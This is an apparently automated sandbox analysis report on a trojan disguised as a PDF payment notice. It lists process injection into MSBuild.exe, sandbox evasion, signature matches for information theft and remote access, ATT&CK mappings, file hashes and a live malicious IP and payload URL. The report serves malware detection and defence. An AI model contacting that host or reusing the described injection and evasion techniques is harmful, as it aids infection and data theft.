                    Source: 0.2.Aviso de pago.pdf____________________________.exe.5d0000.0.unpack, Google.cs | .Net Code: Featured System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exe | Code function: 0_2_04967482 push 8B045BD9h; ret
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exe | Code function: 0_2_04967288 push 8B044388h; ret
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exe | Code function: 0_2_049673CA push 8B044389h; ret
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exe | Code function: 0_2_04967355 push 8B045BDDh; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_0503E1E8 push E802005Eh; retf
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_0503E204 push E801025Eh; ret
                    Source: Aviso de pago.pdf____________________________.exe | Static PE information: 0xD0E49B7F [Mon Jan 20 23:55:43 2081 UTC]
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exe TID: 6404 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exe TID: 6284 | Thread sleep time: -30000s >= -30000s
                    Source: C:\Windows\SysWOW64\timeout.exe TID: 3372 | Thread sleep count: 130 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6880 | Thread sleep count: 44 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6880 | Thread sleep time: -40582836962160988s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6904 | Thread sleep count: 3523 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6904 | Thread sleep count: 6312 > 30
                    Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Window / User API: threadDelayed 3523
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Window / User API: threadDelayed 6312
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exe | Process information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exe | Process token adjusted: Debug
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exe | Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 438000
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 43A000
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: B71008
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 15
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout 15
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exe | Queries volume information: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exe VolumeInformation
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_05F22654 GetUserNameW,

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara match | File source: 0.2.Aviso de pago.pdf____________________________.exe.39d0120.4.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 12.0.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.Aviso de pago.pdf____________________________.exe.39d0120.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 12.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 12.0.MSBuild.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 12.0.MSBuild.exe.400000.3.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 12.0.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000000.00000002.480316793.0000000003980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000C.00000000.472348543.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000C.00000002.626727734.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000C.00000000.471775645.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000C.00000000.472717086.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000C.00000000.473012111.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.480388373.00000000039D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000C.00000002.627763645.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: Aviso de pago.pdf____________________________.exe PID: 6232, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 3272, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara match | File source: 0.2.Aviso de pago.pdf____________________________.exe.39d0120.4.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 12.0.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.Aviso de pago.pdf____________________________.exe.39d0120.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 12.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 12.0.MSBuild.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 12.0.MSBuild.exe.400000.3.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 12.0.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000000.00000002.480316793.0000000003980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000C.00000000.472348543.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000C.00000002.626727734.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000C.00000000.471775645.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000C.00000000.472717086.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000C.00000000.473012111.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.480388373.00000000039D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000C.00000002.627763645.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: Aviso de pago.pdf____________________________.exe PID: 6232, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 3272, type: MEMORYSTR
MITRE ATT&CK Matrix (techniques prefixed with digits are the ones the report flagged for this sample; the digits are the report's signature badges)

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: 211 Windows Management Instrumentation; Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
Privilege Escalation: 211 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
Defense Evasion: 1 Masquerading; 1 Disable or Modify Tools; 131 Virtualization/Sandbox Evasion; 211 Process Injection; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 11 Software Packing; 1 Timestomp; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: 11 Security Software Discovery; 1 Query Registry; 1 Process Discovery; 131 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 Account Discovery; 1 System Owner/User Discovery; 1 File and Directory Discovery; 113 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools
Collection: 11 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Command and Control: 12 Encrypted Channel; 1 Ingress Tool Transfer; 1 Non-Application Layer Protocol; 2 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction
Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample
Source | Detection | Scanner | Label
Aviso de pago.pdf____________________________.exe | 24% | ReversingLabs | ByteCode-MSIL.Trojan.Strictor
Aviso de pago.pdf____________________________.exe | 100% | Joe Sandbox ML |

Dropped Files
No Antivirus matches

Unpacked PE Files
Source | Detection | Scanner | Label
12.0.MSBuild.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8
12.0.MSBuild.exe.400000.1.unpack | 100% | Avira | TR/Spy.Gen8
12.0.MSBuild.exe.400000.3.unpack | 100% | Avira | TR/Spy.Gen8
12.2.MSBuild.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8
12.0.MSBuild.exe.400000.2.unpack | 100% | Avira | TR/Spy.Gen8
12.0.MSBuild.exe.400000.4.unpack | 100% | Avira | TR/Spy.Gen8

Domains
No Antivirus matches

URLs
Source | Detection | Scanner | Label
http://127.0.0.1:HTTP/1.1 | 0% | Avira URL Cloud | safe
http://DynDns.comDynDNS | 0% | URL Reputation | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | 0% | URL Reputation | safe
http://195.133.18.171 | 17% | Virustotal |
http://195.133.18.171 | 100% | Avira URL Cloud | malware
http://195.133.18.171/Znmtganqo_Wvetpunc.jpgT | 100% | Avira URL Cloud | malware
http://195.133.18.171/Znmtganqo_Wvetpunc.jpg | 100% | Avira URL Cloud | malware
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | 0% | URL Reputation | safe
http://WPfLXV.com | 0% | Avira URL Cloud | safe
Contacted Domains
No contacted domains info

Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
http://195.133.18.171/Znmtganqo_Wvetpunc.jpg | true | Avira URL Cloud: malware | unknown

URLs from Memory and Binaries
Name | Source | Malicious | Antivirus Detection | Reputation
http://127.0.0.1:HTTP/1.1 | MSBuild.exe, 0000000C.00000002.627763645.0000000002B11000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
http://DynDns.comDynDNS | MSBuild.exe, 0000000C.00000002.627763645.0000000002B11000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/mgravell/protobuf-neti | Aviso de pago.pdf____________________________.exe, 00000000.00000002.481679330.0000000005920000.00000004.08000000.00040000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000002.480388373.00000000039D0000.00000004.00000800.00020000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000003.468729915.00000000081F4000.00000004.00000800.00020000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000002.480672047.0000000003B3F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://stackoverflow.com/q/14436606/23354 | Aviso de pago.pdf____________________________.exe, 00000000.00000003.468729915.00000000081F4000.00000004.00000800.00020000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000002.480672047.0000000003B3F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/mgravell/protobuf-netJ | Aviso de pago.pdf____________________________.exe, 00000000.00000002.481679330.0000000005920000.00000004.08000000.00040000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000002.480388373.00000000039D0000.00000004.00000800.00020000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000003.468729915.00000000081F4000.00000004.00000800.00020000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000002.480672047.0000000003B3F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | MSBuild.exe, 0000000C.00000002.627763645.0000000002B11000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://stackoverflow.com/q/11564914/23354; | Aviso de pago.pdf____________________________.exe, 00000000.00000002.481679330.0000000005920000.00000004.08000000.00040000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000002.480388373.00000000039D0000.00000004.00000800.00020000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000003.468729915.00000000081F4000.00000004.00000800.00020000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000002.480672047.0000000003B3F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://stackoverflow.com/q/2152978/23354 | Aviso de pago.pdf____________________________.exe, 00000000.00000002.481679330.0000000005920000.00000004.08000000.00040000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000002.480388373.00000000039D0000.00000004.00000800.00020000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000002.480672047.0000000003B3F000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://195.133.18.171 | Aviso de pago.pdf____________________________.exe, 00000000.00000002.475264480.00000000028D1000.00000004.00000800.00020000.00000000.sdmp | true | Virustotal: 17%; Avira URL Cloud: malware | unknown
http://195.133.18.171/Znmtganqo_Wvetpunc.jpgT | Aviso de pago.pdf____________________________.exe, 00000000.00000002.475264480.00000000028D1000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://github.com/mgravell/protobuf-net | Aviso de pago.pdf____________________________.exe, 00000000.00000002.481679330.0000000005920000.00000004.08000000.00040000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000002.480388373.00000000039D0000.00000004.00000800.00020000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000003.468729915.00000000081F4000.00000004.00000800.00020000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000002.480672047.0000000003B3F000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Aviso de pago.pdf____________________________.exe, 00000000.00000002.475264480.00000000028D1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | Aviso de pago.pdf____________________________.exe, 00000000.00000002.480316793.0000000003980000.00000004.00000800.00020000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000002.480388373.00000000039D0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000000.472348543.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://WPfLXV.com | MSBuild.exe, 0000000C.00000002.627763645.0000000002B11000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
Contacted IPs
IP | Domain | Country | ASN | ASN Name | Malicious
195.133.18.171 | unknown | Russian Federation | 197695 | AS-REGRU | true
                                  Joe Sandbox Version:34.0.0 Boulder Opal
                                  Analysis ID:626184
Start date and time:13/05/2022 17:17:18 (2022-05-13 17:17:18 +02:00)
                                  Joe Sandbox Product:CloudBasic
                                  Overall analysis duration:0h 8m 46s
                                  Hypervisor based Inspection enabled:false
                                  Report type:light
                                  Sample file name:Aviso de pago.pdf____________________________.exe
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:21
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • HDC enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Detection:MAL
                                  Classification:mal100.troj.evad.winEXE@8/1@0/1
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HDC Information:
                                  • Successful, ratio: 0.1% (good quality ratio 0.1%)
                                  • Quality average: 100%
                                  • Quality standard deviation: 0%
                                  HCA Information:
                                  • Successful, ratio: 98%
                                  • Number of executed functions: 0
                                  • Number of non-executed functions: 0
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Adjust boot time
                                  • Enable AMSI
                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                  • TCP Packets have been reduced to 100
                                  • Excluded IPs from analysis (whitelisted): 23.3.109.212, 23.35.236.56, 20.190.159.4, 40.126.31.73, 20.190.159.75, 20.190.159.23, 40.126.31.67, 20.190.159.64, 40.126.31.69, 40.126.31.71, 20.82.210.154, 40.126.32.133, 40.126.32.140, 40.126.32.134, 40.126.32.136, 20.190.160.22, 20.190.160.20, 40.126.32.74, 40.126.32.76, 20.199.120.151, 20.199.120.182, 173.222.108.210, 173.222.108.226, 80.67.82.211, 80.67.82.235, 20.199.120.85, 20.54.89.106, 40.125.122.176, 20.223.24.244, 40.112.88.60, 52.152.110.14, 52.242.101.226
                                  • Excluded domains from analysis (whitelisted): www.tm.lg.prod.aadmsa.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, login.live.com, sls.update.microsoft.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, www.tm.a.prd.aadg.akadns.net, wu-bg-sh
• Not all processes were analyzed, report is missing behavior information
                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
17:19:20 | API Interceptor | 1x Sleep call for process: Aviso de pago.pdf____________________________.exe modified
17:19:36 | API Interceptor | 360x Sleep call for process: MSBuild.exe modified
No context
                                  Process:C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):1214
                                  Entropy (8bit):5.355725642582145
                                  Encrypted:false
                                  SSDEEP:24:ML9E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7QJE4oE4KAE4Kx1qE4j:MxHKXwYHKhQnoPtHoxHhAHKzvQJHoHKO
                                  MD5:2717088AB018D5B447B894876B721386
                                  SHA1:C88136905BD0ACEAF8B31A73FB0B12F02D503DCA
                                  SHA-256:34109AB9D426B98603DA4B53D239CCD7A6E09F4C62277BE6B8D4675553A6736D
                                  SHA-512:71FF92D93D8EF19AF3E6E1E4A83EA427BC172DE5BD9C4F69EC28279C77A6586AAB38C4F1C1F66550729DCFC2D8764452D8DE47FBB1C15BCDD4D385EAE3883F14
                                  Malicious:true
                                  Reputation:moderate, very likely benign file
                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Data.SqlXml, Version=4.0.0.0, Culture=neutral, Public
                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Entropy (8bit):5.9748366824969
                                  TrID:
                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                  • DOS Executable Generic (2002/1) 0.01%
                                  File name:Aviso de pago.pdf____________________________.exe
                                  File size:55296
                                  MD5:05b6b97166b339557424ca035418a640
                                  SHA1:e1699c9c10d6807650fcc35fc76c7744deeb16be
                                  SHA256:6797c9eb17e1ad3b41121bc80db0a97ae642bfca0874c8b7bd391507d2ca5540
                                  SHA512:0e2c6febd221d1c2e8a465dca46037ab6f826d5780c0ccb7bface146a15d1031124ddd5097b77f275a0714751559a77b8ea4cc4959c37d7ff336c6a3690ee7c8
                                  SSDEEP:768:RNXVU+bbYXAFM8VvlVjCRvaA5pXyLLqU6tqsDp+CH1S0ADhKDR:RPUcbMAlC4A54z6t9DHHgV+
                                  TLSH:72437C56B386C911C9E80A708C66DA780735FD818CC1A20F33D5BF6F7D322D6D686B66
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.............>6... ...@....@.. ....................... ............`................................
                                  Icon Hash:c00b9b1b233d2dc2
                                  Entrypoint:0x40363e
                                  Entrypoint Section:.text
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                                  Time Stamp:0xD0E49B7F [Mon Jan 20 23:55:43 2081 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:v4.0.30319
                                  OS Version Major:4
                                  OS Version Minor:0
                                  File Version Major:4
                                  File Version Minor:0
